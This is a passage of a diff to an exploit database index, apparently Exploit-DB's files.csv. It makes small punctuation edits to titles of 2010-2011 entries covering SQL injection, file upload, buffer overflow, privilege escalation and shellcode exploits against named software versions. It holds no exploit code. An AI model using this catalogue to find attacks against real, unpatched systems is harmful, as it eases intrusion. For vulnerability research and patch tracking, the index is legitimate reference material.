Execution",2010-07-23,"HaCkEr arar",php,webapps,0 +14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 @@ -12852,7 +12852,7 @@ id,file,description,date,author,platform,type,port 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 -14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 +14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",windows,dos,0 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 @@ -12873,7 +12873,7 @@ id,file,description,date,author,platform,type,port 14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - (.mp3) Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection",2010-08-21,"Salvatore Fresta",php,webapps,0 -14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0 +14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0 14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,asp,webapps,0 @@ -12978,7 +12978,7 @@ id,file,description,date,author,platform,type,port 14839,platforms/php/webapps/14839.txt,"GuestBookPlus HTML Injection & Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",windows,dos,0 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 -14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 +14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side - Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) - Local File Disclosure",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 @@ -12989,7 +12989,7 @@ id,file,description,date,author,platform,type,port 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 -14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service",2010-09-01,d3b4g,windows,dos,0 +14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer - ActiveX Denial of Service",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection",2010-09-01,"BorN To K!LL",php,webapps,0 14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution",2010-09-02,Abysssec,windows,dos,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 @@ -13021,7 +13021,7 @@ id,file,description,date,author,platform,type,port 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 -14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 +14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 @@ -13131,8 +13131,8 @@ id,file,description,date,author,platform,type,port 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 -15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 -15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 +15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 +15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local,0 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 @@ -13275,7 +13275,7 @@ id,file,description,date,author,platform,type,port 15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0 15247,platforms/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 -15249,platforms/php/webapps/15249.txt,"Data/File upload and management Arbitrary File Upload",2010-10-14,saudi0hacker,php,webapps,0 +15249,platforms/php/webapps/15249.txt,"Data/File upload and management - Arbitrary File Upload",2010-10-14,saudi0hacker,php,webapps,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,php,webapps,0 15608,platforms/php/webapps/15608.txt,"Free Simple Software SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0 @@ -13320,7 +13320,7 @@ id,file,description,date,author,platform,type,port 15306,platforms/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0 15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 - Persistent XSS",2010-10-24,"Th3 RDX",php,webapps,0 15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection",2010-10-24,ZonTa,php,webapps,0 -15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 +15310,platforms/php/webapps/15310.py,"Jamb CSRF - Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0 15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0 15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell port 0x1337 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 @@ -13356,7 +13356,7 @@ id,file,description,date,author,platform,type,port 15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0 15345,platforms/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 -15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 +15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 overview.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 @@ -13400,7 +13400,7 @@ id,file,description,date,author,platform,type,port 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 - (comment.php) Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.4.0 < 1.5.5 - Buffer Overflow (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 -15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download",2010-11-03,v1R00Z,php,webapps,0 +15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script - Arbitrary Local File Download",2010-11-03,v1R00Z,php,webapps,0 15405,platforms/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection",2010-11-03,Silic0n,php,webapps,0 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite - NtCreateKey Race Condition",2010-11-03,"Nikita Tarakanov",windows,dos,0 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service",2010-11-03,"Matthew Bergin",windows,dos,0 @@ -13481,7 +13481,7 @@ id,file,description,date,author,platform,type,port 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla Component com_jsupport - XSS",2010-11-12,Valentin,php,webapps,0 15502,platforms/php/webapps/15502.txt,"Joomla Component com_jsupport - SQL Injection",2010-11-12,Valentin,php,webapps,0 -15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 +15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -13531,7 +13531,7 @@ id,file,description,date,author,platform,type,port 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - CSRF",2010-11-19,Or4nG.M4N,php,webapps,0 -15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 +15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - BoF (users.txt) (EggHunter)",2010-11-19,0v3r,windows,local,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software SQL Injection",2010-11-19,JaMbA,php,webapps,0 @@ -13634,7 +13634,7 @@ id,file,description,date,author,platform,type,port 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection",2010-12-06,LiquidWorm,php,webapps,0 -15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload",2010-12-07,"Sun Army",asp,webapps,0 +15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Shell Upload",2010-12-07,"Sun Army",asp,webapps,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 @@ -13648,7 +13648,7 @@ id,file,description,date,author,platform,type,port 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - CSRF",2010-12-09,"High-Tech Bridge SA",php,webapps,0 15720,platforms/php/webapps/15720.txt,"Sulata iSoft - (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 -15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA SQL Injection",2010-12-09,Br0ly,php,webapps,0 +15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 @@ -13671,13 +13671,13 @@ id,file,description,date,author,platform,type,port 15743,platforms/php/webapps/15743.txt,"BLOG:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 -15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script SQL Injection",2010-12-16,ErrNick,php,webapps,0 +15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla JRadio Component (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software Multiple SQL Injection",2010-12-17,v3n0m,php,webapps,0 15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - CSRF (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0 -15754,platforms/php/webapps/15754.txt,"Immo Makler Script SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 +15754,platforms/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 15755,platforms/php/webapps/15755.txt,"Easy Online Shop SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 15756,platforms/php/webapps/15756.txt,"MHP Downloadshop SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 15758,platforms/win_x86/dos/15758.c,"Windows Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 @@ -13687,7 +13687,7 @@ id,file,description,date,author,platform,type,port 15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 15765,platforms/php/webapps/15765.txt,"CubeCart 3.x - Remote File Upload",2010-12-17,StunTMaN!,php,webapps,0 -15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 +15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload",2010-12-18,"Vladimir Vorontsov",php,webapps,0 15769,platforms/php/webapps/15769.txt,"Ero Auktion 2010 - (item.php) SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 @@ -13695,11 +13695,11 @@ id,file,description,date,author,platform,type,port 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15773,platforms/php/webapps/15773.txt,"Projekt Shop - (details.php) Multiple SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 -15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 +15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injection",2010-12-19,"DeadLy DeMon",asp,webapps,0 15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) - LFI",2010-12-19,Sid3^effects,php,webapps,0 -15781,platforms/php/webapps/15781.txt,"Inout Webmail Script Persistent XSS",2010-12-20,Sid3^effects,php,webapps,0 +15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent XSS",2010-12-20,Sid3^effects,php,webapps,0 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - LFI",2010-12-20,xer0x,php,webapps,0 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET Auth Bypass",2010-12-20,"Sense of Security",asp,webapps,0 @@ -13765,7 +13765,7 @@ id,file,description,date,author,platform,type,port 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0 -15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 +15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated - Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Stored XSS (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 @@ -13903,14 +13903,14 @@ id,file,description,date,author,platform,type,port 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 -16055,platforms/windows/remote/16055.txt,"Oracle Document Capture empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 +16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - CSRF",2011-01-26,"Xploit A Day",php,webapps,0 16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software (cid) Blind SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (forced reboot)",2011-01-28,kingcope,bsd,dos,0 -16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 +16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 ASX SEH BOF",2011-01-28,Acidgen,windows,local,0 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer MHTML Protocol Handler XSS",2011-01-29,80vul,windows,local,0 16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 @@ -13928,12 +13928,12 @@ id,file,description,date,author,platform,type,port 16272,platforms/php/webapps/16272.txt,"Limelight Software - (article.php) SQL Injection",2011-03-04,eXeSoul,php,webapps,0 16085,platforms/windows/local/16085.py,"AOL 9.5 - (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection",2011-01-31,"Tim Brown",linux,local,0 -16088,platforms/php/webapps/16088.php,"NetLink Arbitrary File Upload",2011-02-01,lumut--,php,webapps,0 +16088,platforms/php/webapps/16088.php,"NetLink - Arbitrary File Upload",2011-02-01,lumut--,php,webapps,0 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow Exploit",2011-02-01,sup3r,windows,local,0 16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 -16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 +16095,platforms/linux/dos/16095.pl,"Terminal Server Client - .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 16097,platforms/php/webapps/16097.txt,"Zikula CMS 1.2.4 - CSRF",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 @@ -14016,7 +14016,7 @@ id,file,description,date,author,platform,type,port 16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0 -16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 +16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a - HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 16201,platforms/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - (hilfsmittel.php) SQL Injection",2011-02-21,Crazyball,php,webapps,0 @@ -14030,7 +14030,7 @@ id,file,description,date,author,platform,type,port 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple 